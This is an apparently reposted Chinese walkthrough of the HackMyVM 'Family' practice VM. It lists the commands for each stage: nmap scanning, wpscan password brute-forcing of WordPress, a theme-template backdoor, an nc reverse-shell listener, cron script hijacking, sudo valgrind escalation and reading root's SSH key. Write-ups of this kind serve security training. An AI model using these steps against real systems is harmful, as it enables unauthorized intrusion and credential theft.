ICode9
精准搜索请尝试: 精确搜索
首页
编程语言>
数据库
系统相关
互联网
其他分享
Python
Java
JavaScript
android
PHP
首页 > 其他分享> 文章详细

HackMyVM-Family靶机

2022-02-23 20:03:55  阅读:208  来源: 互联网

标签:http family Family HackMyVM wordpress 192.168 靶机 root ssh


靶机信息

靶机地址:https://hackmyvm.eu/machines/machine.php?vm=Family

名称:Family(家庭)

难度:中等

创作者:cromiphi

发布日期:2021-04-30

目标:user.txt和falg.txt,root权限

搭建靶机

下载完Family.ova后,使用Oracle VM VirtualBox导入即可
0

导入时注意!!不要勾上USB控制器,不然会出错
image-20220219214725247

导入完成后,直接启动即可,就可以开始靶机之旅

实验环境

攻击机:VMware		Kali	192.168.31.185
目标机:VirtualBox	Debian	IP自动获取

信息收集

扫描局域网内的靶机IP地址

nmap -sn 192.168.31.0/24

image-20220219214951975

端口扫描,扫描目标机器所开放的服务

nmap -A -p- 192.168.31.214

image-20220219215120089

扫描到22(SSH)、80(HTTP)两个端口,使用火狐浏览器访问80端口,http://192.168.2.214
image-20220219215521794

是个wordpress,继续访问http://192.168.31.214/wordpress/,右击查看源码
image-20220219215829592

本机加个family的hosts再继续访问
image-20220219220051207

目录扫描,扫描一些敏感文件之类的,使用gobuster来扫描

gobuster dir -w /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt -r -u http://family/wordpress/ -x html,php,txt -t 150

image-20220219220323655

渗透测试

使用 wpscan 扫描 wordpress,没有发现可用的

wpscan --url http://family/wordpress/

使用 wpscan来爆破用户名

wpscan --url http://family/wordpress/ --enumerate u

发现一个admin
image-20220219220743690

使用 wpscan来爆破admin用户的密码

wpscan --url http://family/wordpress/ -P /usr/share/wordlists/rockyou.txt -U admin

image-20220219220903399

访问http://family/wordpress/wp-login.php,输入账号密码,登录后台

通过修改模板写入后门,访问文件即可获取反弹shell
image-20220219221359917

访问404页面http://family/wordpress/wp-content/themes/twentytwentyone/404.php

新开一个终端页面开启监听

nc -lvnp 6666

image-20220219221833892

检查home,发现有3个用户
image-20220219222111203

继续寻找一些有用的资源,发现了father用户的密码
image-20220219222433457

新开一个终端页面来登录father用户

ssh father@192.168.31.214
id
cd /home
ls -al

发现/home/mother 属于组father
image-20220219222829912

上传pspy64来查看进程

wget https://github.com/DominicBreuker/pspy/releases/download/v1.2.0/pspy64
chmod +x pspy64
./pspy64

发现/bin/sh -c python ~/check.py每一分钟就执行一次
image-20220219224553318

这样就可以在 /home/mother/check.py 中编写一些反向shell代码,等一分钟后就可以得到mother用户的反向shell
image-20220219225637479

新开一个终端页面开启监听

nc -lvnp 5555

image-20220219225700086

检查用户mother用户的权限,发现可以以用户baby运行二进制valgrind

sudo -l

image-20220219225810211

执行以下命令,得到baby用户的shell

sudo -u baby valgrind /bin/bash
/bin/bash -i

image-20220219230236703

拿到user.txt的flag
image-20220219230349243

再次检查baby用户的权限

sudo -l

image-20220219230721805

查看root的ssh密钥

sudo cat /root/.ssh/id_rsa

image-20220219230942821

将ssh密钥保存下来,通过ssh密钥来提权

新开一个终端页面来登录root

chmod 600 id_rsa
ssh -i id_rsa root@192.168.31.214

image-20220219231502457

发现一登录就会退出,因为 /root/.ssh/authorized_keys 执行 /root/troll.sh,它就会立即退出
image-20220219231755424

现在要使shell代码不退出,需要将终端尺寸变小,使“more”无法显示全部信息再通过!/bin/bash来转义

ssh -i id_rsa root@192.168.31.214
!/bin/bash

image-20220219232411196

成功获取到root权限,拿到flag

声明:请勿用作违法用途,请在授权情况下使用

标签:http,family,Family,HackMyVM,wordpress,192.168,靶机,root,ssh
来源: https://www.cnblogs.com/tkb-/p/15928983.html

本站声明: 1. iCode9 技术分享网(下文简称本站)提供的所有内容,仅供技术学习、探讨和分享;
2. 关于本站的所有留言、评论、转载及引用,纯属内容发起人的个人观点,与本站观点和立场无关;
3. 关于本站的所有言论和文字,纯属内容发起人的个人观点,与本站观点和立场无关;
4. 本站文章均是网友提供,不完全保证技术分享内容的完整性、准确性、时效性、风险性和版权归属;如您发现该文章侵犯了您的权益,可联系我们第一时间进行删除;
5. 本站为非盈利性的个人网站,所有内容不会用来进行牟利,也不会利用任何形式的广告来间接获益,纯粹是为了广大技术爱好者提供技术内容和技术思想的分享性交流网站。

关于我们 | 联系我们 | 留言反馈

专注分享技术,共同学习,共同进步。侵权联系[81616952@qq.com]

Copyright (C)ICode9.com, All Rights Reserved.

ICode9版权所有